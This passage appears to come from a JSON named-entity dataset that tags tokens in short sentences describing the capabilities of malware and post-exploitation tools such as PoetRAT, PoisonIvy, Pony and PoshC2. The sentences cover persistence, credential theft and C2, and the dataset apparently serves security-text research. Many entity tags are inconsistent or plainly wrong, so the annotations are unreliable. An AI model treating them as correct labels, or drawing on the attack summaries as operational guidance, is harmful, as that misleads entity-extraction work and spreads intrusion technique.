- "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "list", - "all", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "was", - "executed", - "with", - "a", - "Python", - "script", - "and", - "worked", - "in", - "conjunction", - "with", - "additional", - "Python-based", - "post-exploitation", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "added", - "a", - "registry", - "key", - "in", - "the", - "<RUN>", - "hive", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "used", - "Nmap", - "for", - "remote", - "system", - "discovery." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "take", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "was", - "distributed", - "via", - "malicious", - "Word", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "checked", - "the", - "size", - "of", - "the", - "hard", - "drive", - "to", - "determine", - "if", - "it", - "was", - "being", - "run", - "in", - "a", - "sandbox", - "environment.", - "In", - "the", - "event", - "of", - "sandbox", - "detection,", - "it", - "would", - "delete", - "itself", - "by", - "overwriting", - "the", - "malware", - "scripts", - "with", - "the", - "contents", - "of", - "\"License.txt\"", - "and", - "exiting." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "gather", - "information", - "about", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "sent", - "username,", - "computer", - "name,", - "and", - "the", - "previously", - "generated", - "UUID", - "in", - "reply", - "to", - "a", - "\"who\"", - "command", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "a", - "Python", - "tool", - "named", - "Bewmac", - "to", - "record", - "the", - "webcam", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "Word", - "documents", - "with", - "VBScripts", - "to", - "execute", - "malicious", - "activities." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "HTTP", - "and", - "HTTPs", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "called", - "cmd", - "through", - "a", - "Word", - "document", - "macro." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Tool", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "Registry", - "key", - "in", - "the", - "Active", - "Setup", - "pointing", - "to", - "a", - "malicious", - "executable." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "captures", - "window", - "titles." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "steal", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "can", - "inject", - "a", - "malicious", - "DLL", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "upload", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "contains", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PoisonIvy", - "stages", - "collected", - "data", - "in", - "a", - "text", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "Registry", - "subkey", - "that", - "registers", - "a", - "new", - "system", - "device." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "hides", - "any", - "strings", - "related", - "to", - "its", - "own", - "indicators", - "of", - "compromise." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "run", - "key", - "Registry", - "entries", - "pointing", - "to", - "a", - "malicious", - "executable", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "starts", - "a", - "rootkit", - "from", - "a", - "malicious", - "file", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "uses", - "the", - "Camellia", - "cipher", - "to", - "encrypt", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "open", - "a", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoisonIvy", - "creates", - "a", - "Registry", - "subkey", - "that", - "registers", - "a", - "new", - "service.", - "PoisonIvy", - "also", - "creates", - "a", - "Registry", - "entry", - "modifying", - "the", - "Logical", - "Disk", - "Manager", - "service", - "to", - "point", - "to", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "use", - "Twitter,", - "Reddit,", - "Imgur", - "and", - "other", - "websites", - "to", - "get", - "a", - "C2", - "URL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Org", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "use", - "a", - "custom", - "algorithm", - "to", - "decrypt", - "strings", - "used", - "by", - "the", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "store", - "encrypted", - "JSON", - "configuration", - "files", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "retrieve", - "payloads", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "write", - "encrypted", - "JSON", - "configuration", - "files", - "to", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "use", - "<code>LoadLibraryW</code>", - "and", - "<code>CreateProcess</code>", - "to", - "load", - "and", - "execute", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "custom", - "encrypt", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "be", - "executed", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "can", - "use", - "steganography", - "to", - "hide", - "C2", - "information", - "in", - "images." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PolyglotDuke", - "has", - "has", - "used", - "HTTP", - "GET", - "requests", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "scripts", - "to", - "delete", - "itself", - "after", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "can", - "download", - "additional", - "files", - "onto", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "the", - "<code>NetUserEnum</code>", - "function", - "to", - "enumerate", - "local", - "accounts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "attempted", - "to", - "lure", - "targets", - "into", - "downloading", - "an", - "attached", - "executable", - "(ZIP,", - "RAR,", - "or", - "CAB", - "archives)", - "or", - "document", - "(PDF", - "or", - "other", - "MS", - "Office", - "format)." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "attempted", - "to", - "lure", - "targets", - "into", - "clicking", - "links", - "in", - "spoofed", - "emails", - "from", - "legitimate", - "banks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "the", - "Adobe", - "Reader", - "icon", - "for", - "the", - "downloaded", - "file", - "to", - "look", - "more", - "trustworthy." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "several", - "Windows", - "functions", - "for", - "various", - "purposes." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Pony", - "attachments", - "have", - "been", - "delivered", - "via", - "compressed", - "archive", - "files.", - "Pony", - "also", - "obfuscates", - "the", - "memory", - "flow", - "by", - "adding", - "junk", - "instructions", - "when", - "executing", - "to", - "make", - "analysis", - "more", - "difficult." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "a", - "small", - "dictionary", - "of", - "common", - "passwords", - "against", - "a", - "collected", - "list", - "of", - "local", - "accounts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "been", - "delivered", - "via", - "spearphishing", - "attachments." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "been", - "delivered", - "via", - "spearphishing", - "emails", - "which", - "contained", - "malicious", - "links." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "collected", - "the", - "Service", - "Pack,", - "language,", - "and", - "region", - "information", - "to", - "send", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "delayed", - "execution", - "using", - "a", - "built-in", - "function", - "to", - "avoid", - "detection", - "and", - "analysis." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "sent", - "collected", - "information", - "to", - "the", - "C2", - "via", - "HTTP", - "POST", - "request." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pony", - "has", - "used", - "batch", - "scripts", - "to", - "delete", - "itself", - "after", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "use", - "Invoke-TokenManipulation", - "for", - "manipulating", - "tokens." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "a", - "module", - "for", - "compressing", - "data", - "using", - "ZIP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "a", - "module", - "for", - "recursively", - "parsing", - "through", - "files", - "and", - "directories", - "to", - "gather", - "valid", - "credit", - "card", - "numbers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "modules", - "for", - "brute", - "forcing", - "local", - "administrator", - "and", - "AD", - "user", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "utilize", - "multiple", - "methods", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "use", - "Invoke-RunAs", - "to", - "make", - "tokens." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "modules", - "for", - "searching", - "for", - "passwords", - "in", - "local", - "and", - "remote", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "decrypt", - "passwords", - "stored", - "in", - "the", - "RDCMan", - "configuration", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "enumerate", - "local", - "and", - "domain", - "user", - "account", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "modules", - "for", - "enumerating", - "domain", - "trusts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "modules", - "for", - "local", - "privilege", - "escalation", - "exploits", - "such", - "as", - "CVE-2016-9192", - "and", - "CVE-2016-0099." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "a", - "module", - "for", - "exploiting", - "SMB", - "via", - "EternalBlue." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "enumerate", - "files", - "on", - "the", - "local", - "file", - "system", - "and", - "includes", - "a", - "module", - "for", - "enumerating", - "recently", - "accessed", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "modules", - "for", - "keystroke", - "logging", - "and", - "capturing", - "credentials", - "from", - "spoofed", - "Outlook", - "authentication", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "use", - "Inveigh", - "to", - "conduct", - "name", - "service", - "poisoning", - "for", - "credential", - "theft", - "and", - "associated", - "relay", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "an", - "implementation", - "of", - "Mimikatz", - "to", - "gather", - "credentials", - "from", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "enumerate", - "local", - "and", - "domain", - "user", - "account", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "modules,", - "such", - "as", - "<code>Get-LocAdm</code>", - "for", - "enumerating", - "permission", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "perform", - "port", - "scans", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "a", - "module", - "for", - "taking", - "packet", - "captures", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "a", - "number", - "of", - "modules", - "that", - "leverage", - "pass", - "the", - "hash", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "use", - "<code>Get-PassPol</code>", - "to", - "enumerate", - "the", - "domain", - "password", - "policy." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "multiple", - "modules", - "for", - "injecting", - "into", - "processes,", - "such", - "as", - "<code>Invoke-PSInject</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "modules", - "that", - "allow", - "for", - "use", - "of", - "proxies", - "in", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "an", - "implementation", - "of", - "PsExec", - "for", - "remote", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "modules,", - "such", - "as", - "<code>Get-ComputerInfo</code>,", - "for", - "enumerating", - "common", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "enumerate", - "network", - "adapter", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "PoshC2", - "contains", - "an", - "implementation", - "of", - "netstat", - "to", - "enumerate", - "TCP", - "and", - "UDP", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "enumerate", - "service", - "and", - "service", - "permission", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "can", - "use", - "protocols", - "like", - "HTTP/HTTPS", - "for", - "command", - "and", - "control", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "a", - "number", - "of", - "modules", - "that", - "use", - "WMI", - "to", - "execute", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoshC2", - "has", - "the", - "ability", - "to", - "persist", - "on", - "a", - "system", - "using", - "WMI", - "events." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "can", - "side-load", - "`Goopdate.dll`", - "into", - "`GoogleUpdate.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PowGoop", - "can", - "decrypt", - "PowerShell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "can", - "receive", - "encrypted", - "commands", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "has", - "disguised", - "a", - "PowerShell", - "script", - "as", - "a", - ".dat", - "file", - "(goopdate.dat)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile", - "I-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "PowGoop", - "has", - "used", - "a", - "DLL", - "named", - "Goopdate.dll", - "to", - "impersonate", - "a", - "legitimate", - "Google", - "update", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "can", - "use", - "a", - "modified", - "Base64", - "encoding", - "mechanism", - "to", - "send", - "data", - "to", - "and", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "has", - "the", - "ability", - "to", - "use", - "PowerShell", - "scripts", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowGoop", - "can", - "send", - "HTTP", - "GET", - "requests", - "to", - "malicious", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Power", - "Loader", - "overwrites", - "Explorer’s", - "Shell_TrayWnd", - "extra", - "window", - "memory", - "to", - "redirect", - "execution", - "to", - "a", - "NTDLL", - "function", - "that", - "is", - "abused", - "to", - "assemble", - "and", - "execute", - "a", - "return-oriented", - "programming", - "(ROP)", - "chain", - "and", - "create", - "a", - "malicious", - "thread", - "within", - "Explorer.exe." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "get", - "text", - "of", - "the", - "current", - "foreground", - "window." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "write", - "random", - "data", - "across", - "a", - "file", - "and", - "delete", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "write", - "random", - "data", - "across", - "a", - "file", - "and", - "delete", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "commands", - "to", - "get", - "the", - "current", - "directory", - "name", - "as", - "well", - "as", - "the", - "size", - "of", - "a", - "file.", - "It", - "also", - "has", - "commands", - "to", - "obtain", - "information", - "about", - "logical", - "drives,", - "drive", - "type,", - "and", - "free", - "space." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "download", - "a", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "hides", - "many", - "of", - "its", - "backdoor", - "payloads", - "in", - "an", - "alternate", - "data", - "stream", - "(ADS)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "list", - "the", - "victim's", - "processes." - ], - "ner_tags": [ - 